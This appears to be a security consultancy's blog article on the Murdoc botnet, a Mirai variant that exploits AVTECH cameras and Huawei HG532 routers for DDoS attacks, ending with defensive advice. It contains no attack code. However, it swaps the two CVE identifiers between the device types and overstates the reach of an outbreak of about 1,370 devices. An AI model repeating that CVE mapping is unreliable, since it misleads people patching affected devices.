In the modern digital age, we live in an increasingly interconnected world, where smart devices and internet connectivity have been integrated into all aspects of our daily lives. From security cameras to smart thermostats, refrigerators, and lighting systems, Internet of Things (IoT) devices are present in millions of homes and businesses. While these advancements have brought countless benefits in terms of convenience and efficiency, they have also opened the doors to new and sophisticated types of cyberattacks.
One of the most concerning threats that has emerged in this interconnected environment is the Murdoc botnet, a type of malware that is exploiting critical vulnerabilities in common devices such as AVTECH cameras and Huawei HG532 routers to propagate large-scale cyberattacks. This Murdoc threat not only jeopardizes the security of users and their devices but also impacts the privacy of millions of people and puts global digital infrastructure at risk.
In this article from ITD Consulting, we will explore how the Murdoc botnet works, how it spreads, and what measures we can take to protect ourselves from this growing threat. Additionally, we will examine the impact that these Murdoc cyberattacks have on businesses, users, and society in general, as well as its evolution from other previous incidents, such as the infamous Mirai botnet attack in 2016.
What is a botnet?
A botnet is a network of devices infected by malware, which allows attackers to remotely control those devices. The devices that are part of a botnet are known as "bots" or "zombies," as they act without the knowledge or consent of their owners.
These bots are used to carry out a variety of malicious activities, such as Distributed Denial of Service (DDoS) attacks, stealing personal information, distributing malware, and digital extortion. What makes a botnet so dangerous is its ability to carry out large-scale attacks.
By controlling thousands, or even millions, of devices, cybercriminals can generate massive processing power that allows them to overwhelm digital infrastructures and online systems, causing significant disruption to services and exposing users' personal data.
The Murdoc botnet is a more modern and advanced version of the Mirai botnet, which wreaked havoc in 2016 by launching massive DDoS attacks on companies and popular Internet platforms like Netflix, Twitter, and Spotify. Although the creators of Mirai were arrested and the malware's source code was published online, which allowed other cybercriminals to modify and adapt it, the attacks continue and have evolved into new variants, including Murdoc.
The resurgence of the Murdoc botnet: Features and propagation methods
Murdoc is characterized by its ability to infect a wide variety of internet-connected devices, making it a global and multifaceted threat. This Murdoc botnet has reappeared with much more sophisticated propagation methods than its predecessors.
According to the Qualys Threat Research Unit, Murdoc attackers have begun exploiting known vulnerabilities in common devices such as AVTECH cameras and Huawei HG532 routers. These vulnerabilities are exploited by attackers to take remote control of the devices and use them as part of the Murdoc botnet.
The vulnerabilities that Murdoc exploits are identified by the CVE codes CVE-2017-17215 and CVE-2024-7029. CVE-2017-17215 affects a range of AVTECH security camera models, while CVE-2024-7029 impacts Huawei HG532 routers. When these devices are infected, the Murdoc malware installs and turns the device into part of the botnet controlled by the cybercriminals.
The infection process of Murdoc follows a methodology known as vulnerability exploitation. Attackers use exploits—programs specifically designed to take advantage of security flaws in a device's software or hardware—to install the Murdoc malware.
Once the exploit has been successfully executed, a malicious Murdoc file is loaded that connects the infected device to the botnet. From there, the device is remotely controlled by the attackers, who can use it to carry out a range of malicious activities, including sending massive traffic in a DDoS attack.
According to Qualys researchers, more than 500 malicious file samples have been identified as capable of infecting a wide variety of IoT devices, such as IP cameras and routers. These infected devices can be used to carry out DDoS attacks, meaning they can send enormous amounts of traffic to a victim's servers, overwhelming their systems and causing significant service disruption.
The Murdoc botnet and DDoS attacks
One of the primary objectives of the Murdoc botnet is to carry out Distributed Denial of Service (DDoS) attacks. In a DDoS attack, attackers flood a victim's servers with massive traffic, causing the server to become overwhelmed and eventually crash. This type of attack can severely affect online platforms, essential services, and, for businesses, disrupt their ability to operate normally.
What distinguishes Murdoc from other botnets is its ability to compromise commonly used IoT devices and aggressively expand its network. This capacity of Murdoc increases the scale of attacks, allowing attackers to generate massive and much more powerful traffic flows. A successful DDoS attack can not only disrupt the service but also cause economic and reputational damage to the victims.
Since the Murdoc botnet was detected in July 2024, over 1,370 devices have been compromised, and the botnet continues to grow. The countries most affected by this Murdoc threat include Malaysia, Mexico, Thailand, Indonesia, and Vietnam.
However, any device vulnerable to Murdoc connected to the Internet can be targeted by this attack. This means the threat of Murdoc is global and affects millions of users and organizations worldwide.
The global impact of the Murdoc botnet
Although many of the most well-known attacks of the Murdoc botnet have taken place in countries in Asia and Latin America, the threat is global. What makes Murdoc particularly concerning is that attackers can compromise everyday devices such as security cameras, routers, and other IoT appliances. Due to the ubiquity of these devices, any user or company connected to the Internet can become a victim of a Murdoc attack.
The impact of a DDoS attack is not limited to service disruption. It can also have serious economic and reputational consequences for the affected companies. If an e-commerce website or an online platform is disrupted by a DDoS attack, customers will be unable to access the services, resulting in a loss of revenue and trust in the brand.
In the case of surveillance devices, such as IP cameras, the risk of Murdoc is not only service disruption but also exposure of privacy. Cameras infected with Murdoc can be used to spy on users and compromise sensitive information. This type of Murdoc attack could have even more serious implications if carried out against critical infrastructure or essential services.
The origin and evolution from Mirai to Murdoc
The Murdoc botnet is not a new threat; in fact, it is the evolution of the famous Mirai botnet, which was responsible for one of the largest DDoS attacks in history. In 2016, Mirai was used to attack the internet infrastructure services company Dyn, causing a massive outage of popular platforms such as Netflix, Twitter, and Spotify. The attackers used compromised IoT devices, such as security cameras and routers, to generate massive traffic and collapse Dyn's servers.
The source code of Mirai was released online in 2017, allowing other cybercriminals to adapt and modify the malware. Since then, Mirai has given rise to new variants, such as Murdoc, which are more advanced and capable of exploiting a broader range of vulnerabilities in connected devices.
What makes Murdoc so dangerous is its ability to quickly adapt to new vulnerabilities. While Mirai mainly targeted devices using default or weak passwords, Murdoc is capable of exploiting vulnerabilities in devices from well-known brands such as Huawei and AVTECH, significantly increasing its ability to spread and compromise more devices.
How to protect yourself from the Murdoc botnet and other cyberattacks?
As cyberattacks continue to evolve, it is crucial for users and companies to take preventive measures to protect themselves from botnets like Murdoc. Here are some key recommendations to defend against Murdoc.
- Update firmware and software: Internet-connected devices should be kept up to date to protect against known vulnerabilities. Manufacturers often release security patches to fix flaws in device software, so it's important to install these patches as soon as they become available.
- Change default passwords: Many IoT devices, such as security cameras and routers, come with default passwords that are easily exploited by attackers. Changing these passwords to stronger, unique ones is one of the best ways to protect your devices.
- Monitor network traffic: If you are a network administrator, it’s important to monitor traffic for unusual patterns that may indicate a botnet infection. Detecting suspicious activity early can help you prevent greater damage.
- Disable unnecessary services: Many IoT devices have services like Telnet enabled by default, which can serve as an entry point for attackers. If you don’t need these services, it is recommended to disable them to reduce the attack surface.
- Segregate networks: If you have multiple IoT devices in your home or business, create a separate network for these devices. This will prevent a compromised device from affecting others that are more critical.
The Murdoc botnet is not just an isolated threat, but rather reflects a growing trend in the field of cybersecurity, where attackers exploit vulnerabilities in commonly used devices, such as security cameras, routers, and other Internet of Things (IoT) devices. These devices, often neglected in terms of maintenance and security, represent vulnerable points within our personal and business networks.
The evolution of Murdoc from the Mirai botnet demonstrates how cybercriminals can learn from their previous attacks, adapting their malware to new vulnerabilities and expanding their capabilities to cause greater damage. This ability to adapt makes Murdoc an even more dangerous and difficult-to-eradicate threat, as attackers continue to find ways to exploit security gaps in connected devices, allowing them to keep their botnets active and effective.
The fight against botnets like Murdoc requires a collaborative approach involving all actors, from individual users to large corporations and governments. For businesses, especially those that rely on critical infrastructure and online services, the consequences of a DDoS attack can be devastating not only in economic terms but also in customer trust.
Government institutions, in turn, must implement policies that promote greater security in national infrastructures, especially in the context of smart cities and the growing interconnection of essential services. On an individual level, people also have a responsibility to protect their devices, ensuring they remain updated and properly configured to reduce the risk of becoming victims of these attacks.
Additionally, it is essential that users and organizations do not underestimate the value of security in IoT devices, even though they may sometimes seem harmless or insignificant. The tendency to install smart devices without considering their security implications is one of the main reasons why attacks like those from Murdoc have become so effective.
The lack of preventive measures, such as changing default passwords or disabling unnecessary services, opens an easy door for attackers, who can take control of these devices and use them as an extension of their botnet. This highlights the need to educate users about the risks associated with constant connectivity and the importance of basic online security practices.
Ultimately, protection against the Murdoc botnet and other similar cyber threats is not just a technical challenge but also a matter of awareness and digital responsibility. As technology continues to advance and device interconnection grows, so does the need for a more conscious and proactive approach to security.
Users must be aware that protecting their devices not only guarantees their own security but also contributes to the security of global digital infrastructure. Only through a sustained collective effort, including preventive measures, constant updates, and continuous vigilance, can we mitigate the impact of these threats and keep our infrastructures and data safe from cybercriminals.
If you want to learn more about the latest cybersecurity threats like the Murdoc botnet and how to protect yourself, write to us at [email protected]. We have cybersecurity solutions tailored to your needs.
EN 
ES